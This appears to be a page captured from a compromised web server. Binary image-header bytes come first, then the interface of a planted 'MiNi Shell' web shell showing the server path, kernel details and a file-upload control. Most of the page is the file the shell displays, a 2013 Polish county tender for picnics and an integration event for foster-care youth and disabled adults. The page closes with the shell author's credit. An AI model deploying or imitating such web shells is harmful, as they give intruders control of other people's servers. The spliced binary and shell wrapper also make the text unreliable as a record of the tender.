JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/63815-N-2013.html

<p class="kh_header"><b>Końskie: Część 1: zorganizowanie 3 spotkań rekreacyjno - sportowych (pikników) 
dla łącznie 150 osób (tj. Uczestników Projektu i osób z ich otoczenia)

Część 2: zorganizowanie imprezy integracyjnej, połączonej z konferencją 
podsumowującą projekt dla 150 osób (tj. Uczestników Projektu i osób z ich otoczenia)</b><br>
<b>Numer ogłoszenia: 63815 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1: zorganizowanie 3 spotkań rekreacyjno - sportowych (pikników) 
dla łącznie 150 osób (tj. Uczestników Projektu i osób z ich otoczenia)

Część 2: zorganizowanie imprezy integracyjnej, połączonej z konferencją 
podsumowującą projekt dla 150 osób (tj. Uczestników Projektu i osób z ich otoczenia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na:
a)zorganizowaniu 3 spotkań rekreacyjno - sportowych (pikników) dla łącznie 150 osób (tj. Uczestników Projektu i ich otoczenia), co stanowi Część 1 Zadania z podziałem na następujące grupy:
-1 spotkanie: wychowankowie rodzin zastępczych w wieku 15-18 lat i ich otoczenie oraz usamodzielniani wychowankowie rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18-25 lat i ich otoczenie (łączna liczba Uczestników - do 50 osób),
-2 spotkanie: dorosłe osoby niepełnosprawne i ich otoczenie (łączna liczba Uczestników - do 50 osób),
-3 spotkanie - dorosłe osoby niepełnosprawne i ich otoczenie (łączna liczba Uczestników - do 50 osób)
b)zorganizowaniu imprezy integracyjnej, połączonej z konferencją podsumowującą projekt dla 150 osób (tj. Uczestników Projektu i osób z ich otoczenia), co stanowi Część 2 Zadania: 
-dla wychowanków rodzin zastępczych w wieku 15-18 lat i ich otoczenia,
-dla usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18-25 lat i ich otoczenia,
-dla dorosłych osób niepełnosprawnych i ich otoczenia.
2.Wymagany termin realizacji przedmiotu zamówienia: 
a)Część 1 Zadania - w terminie pomiędzy 17 czerwca 2013 r. a 28 czerwca 2013 r. Spotkania należy przeprowadzić w dni powszednie (pon - pt) z wyłączeniem dni ustawowo wolnych od pracy.
b)Część 2 Zadania - w terminie pomiędzy 02 grudnia 2013 r. a 14 grudnia 2013 r. (dni tygodnia: piątek lub sobota)
3.Miejsce realizacji zamówienia:
-Część 1 - teren miasta Końskie,
-Część 2 - teren miasta Końskie.
4.Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
I.w odniesieniu do każdego z 3 spotkań rekreacyjno - sportowych (pikników) dla łącznie 150 osób (tj. Uczestników Projektu i ich otoczenia), które stanowią Część I Zadania:
a)Wykonawca zobowiązuje się przeprowadzić 3 spotkania rekreacyjno - sportowe (pikniki) dla łącznej liczby 150 osób, zgodnie z podziałem na grupy, wskazanym w pkt. 1 a) SOZ,
b)Wykonawca zapewni organizację 2 pikników dla dorosłych osób niepełnosprawnych na terenie obiektu dostosowanego do potrzeb osób niepełnosprawnych, w tym osób poruszających się na wózkach inwalidzkich,
c)Obiekt/y, na terenie których będą organizowane spotkania, musi posiadać teren do zorganizowania zawodów sportowych. Wykonawca zapewni dostęp do zadaszonej wiaty lub namiotów, w których odbędą się imprezy w przypadku niekorzystnych warunków atmosferycznych,
d)Czas trwania każdego pikniku - 4 godziny zegarowe. Zamawiający przewiduje możliwość organizacji przez Wykonawcę maksymalnie dwóch pikników jednego dnia, przy czym przerwa pomiędzy imprezami powinna wynosić 2 godziny zegarowe,
e)Wykonawca zapewni podczas każdego z pikników usługę cateringu dla każdego z uczestników pikniku: kiełbasa wiejska z grilla i kaszanka z grilla (porcje po 20 dag na 1 osobę), karkówka z grilla (porcja 15 dag na 1 osobę), żurek z jajkiem i wędzonką (300 ml na 1 osobę), pieczywo (25 dag na 1 osobę), kawa i herbata (po jednym termosie 2-litrowym na 8 osób), cukier, musztarda, ketchup, zimne napoje (sok pomarańczowy, jabłkowy, porzeczkowy - 0,5 litra na 1 osobę łącznie), woda mineralna niegazowana  oraz napoje gazowane  - 0,5 litra na 1 osobę łącznie), naczynia jednorazowe - w ilości stosownej do liczby uczestników  i potraw,
f)Wykonawca zorganizuje podczas każdego z pikników 3 konkurencje sportowe, tj.:
-przeciąganie liny - 2 drużyny 5-osobowe (w przypadku niekorzystnych warunków atmosferycznych - zamiennie inna konkurencja drużynowa - zaproponowana przez Wykonawcę),
-dart (rzucanie lotkami do tarczy),
-podbijanie piłki siatkowej i/lub nożnej.
g)Wykonawca zakupi nagrody rzeczowe dla zwycięzców indywidualnych konkurencji sportowych (dart, podbijanie piłki siatkowej i/lub nożnej) podczas każdego z 3 pikników:
-za 1 miejsce - plecak turystyczny o parametrach: materiał: 100% poliester, wymiary ok.: 46 x 30 x 16 cm, pojemność: ok. 25 l, kieszenie zewnętrzne: 1 + 1 + 2, waga: ok. 550 g, profilowane, pogrubione szelki, pas biodrowy, elementy odblaskowe, obustronne kieszenie z gęstej, elastycznej siatki, system wentylacji pleców, usztywnione plecy, pokrowiec przeciwdeszczowy, kolor - dowolny,
-za 2 miejsce - kije trekkingowe 3-segmentowe, materiał: aluminium, długość: ok. 110-135 cm, długość po złożeniu: ok. 63 cm, stalowy grot, stopki z twardej gumy, profilowana twarda rękojeść z tworzywa, pod rękojeścią uchwyt z gąbki, pasek na nadgarstek, regulacja długości, waga 1 kija: ok. 340 g.
-za 3 miejsce - portfel sportowy z materiału, zapinany na rzep z dwoma kieszeniami na banknoty oraz jedną - na bilony zapinaną na zamek, przegródki na karty oraz dwie dodatkowe kieszenie na dokumenty. Wymiar portfela: ok.12 cm. x 10 cm.
h)Wykonawca zakupi nagrody rzeczowe dla każdej zwycięskiej 5 - osobowej drużyny biorącej udział w konkurencji przeciągania liny, tj. brelok - latarka z karabińczykiem, kolor - dowolny, wymiary: ok. 1,6 x 9,2 cm, materiał: aluminium.
i)Nagrody zakupione będą dla uczestników każdego z trzech spotkań rekreacyjno - sportowych (pikników)
j)Wykonawca zapewni kadrę do przeprowadzenia poszczególnych pikników - co najmniej 3 osoby obsługujące uczestników każdego z trzech pikników oraz organizujące konkursy i czuwające nad ich przebiegiem,
k)Wykonawca zapewni opiekę medyczną (wykwalifikowaną pielęgniarkę) podczas trwania każdego z 3 pikników.
l)Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika pikników obejmujące pobyt na pikniku, na kwotę 10.000 zł na jedną osobę,
m)Wykonawca zapewni podczas imprez warunki zgodne z przepisami BHP i p.poż,
n)Wykonawca oznaczy miejsce imprezy, poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego).
II.w odniesieniu do zorganizowania jednej imprezy integracyjnej połączonej z konferencją podsumowującą projekt dla łącznie 150 osób (tj. Uczestników Projektu i ich otoczenia), co stanowi Część 2 Zadania:
a)Wykonawca zobowiązuje się do organizacji imprezy integracyjnej połączonej z konferencją podsumowującą projekt, w dowolny piątek lub sobotę w terminie wskazanym w pkt. 2 b) SOZ w godzinach 16.00 - 22.00,
b)Wykonawca zapewni lokal mieszczący minimum 150 osób, wyposażony w klimatyzację, dostosowany do potrzeb osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich,
c)Lokal będzie wyposażony w mikrofon bezprzewodowy, sprzęt nagłośnieniowy, ekran do rzutnika,
d)Wykonawca zapewni uczestnikom imprezy trzy gorące posiłki:
-1 danie - rosół z kluskami,
-2 danie - kotlet schabowy, ziemniaki zapiekane i/lub frytki, zestaw 3 surówek,
-3 danie - czerwony barszcz z krokietem.
e)Wykonawca zapewni zimne przekąski tj.: półmiski z pieczonym mięsem (jeden półmisek zawierający 0,5 kg mięs pieczonych na 10 osób), śledź w oleju (jeden półmisek zawierający 50 dag śledzi na 10 osób), jajka faszerowane (1 jajko na 1 osobę), sałatka warzywna (10 dag na 1 osobę), sałatka grecka (5 dag na 1 osobę), kęski kurczaka w sezamie (5 dag na 1 osobę), pieczywo, paterę ciast (sernik, szarlotka - po porcji na 1 osobę) i paterę owoców (winogrona, banany, kiwi, mandarynki) - jedna patera na 10 osób,
f)Wykonawca zapewni uczestnikom imprezy napoje gorące (kawa, herbata) i zimne napoje (sok pomarańczowy, jabłkowy, porzeczkowy - 0,75 litra na 1 osobę łącznie, woda mineralna niegazowana - 0,5 litra na osobę oraz napoje gazowane - 0,5 litra na 1 osobę),
g)Wykonawca zapewni oprawę muzyczną przez DJ,
h)Wykonawca zapewni 4 kelnerów do obsługi oraz minimum 2 osoby nadzorujące przebieg imprezy,
i)Wykonawca opłaci ubezpieczenie wszystkich uczestników imprezy na kwotę nie niższą niż 10.000 zł. na osobę,
j)Wykonawca zapewni podczas imprezy warunki zgodne z przepisami BHP i p.poż,
k)Wykonawca zapewni szatnię i osobę ją obsługującą,
l)Wykonawca oznaczy miejsce imprezy, poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy, w zakresie wskazanym w Rozdziale 4, pkt. 4.1.1. - 4.1.4 SIWZ - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ,
- Jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania              z nich przy wykonywaniu zamówienia,
-W przypadku wnoszenia oferty przez wykonawców występujących wspólnie, wykonawcy muszą złożyć oświadczenia i dokumenty, o których mowa w Rozdziale 5 SIWZ, z tym, że dokumenty wymienione w pkt 5.1.2 - 5.1.4 (i odpowiednio pkt 5.3) należy złożyć odrębnie dla każdego wykonawcy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie zmiany:terminów realizacji zamówienia, w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie, pok. Nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Końskich, ul. Stanisława Staszica 2, 26-200 Końskie, pok. Nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca jest zobowiązany wykonać zamówienie w terminie:
a)Część 1 Zadania - w terminie pomiędzy 17 czerwca 2013 r. a 28 czerwca 2013 r. Spotkania należy przeprowadzić w dni powszednie (pon - pt) z wyłączeniem dni ustawowo wolnych od pracy.
b)Część 2 Zadania - w terminie pomiędzy 02 grudnia 2013 r. a 14 grudnia 2013 r. (dni tygodnia: piątek lub sobota)
Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie  aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com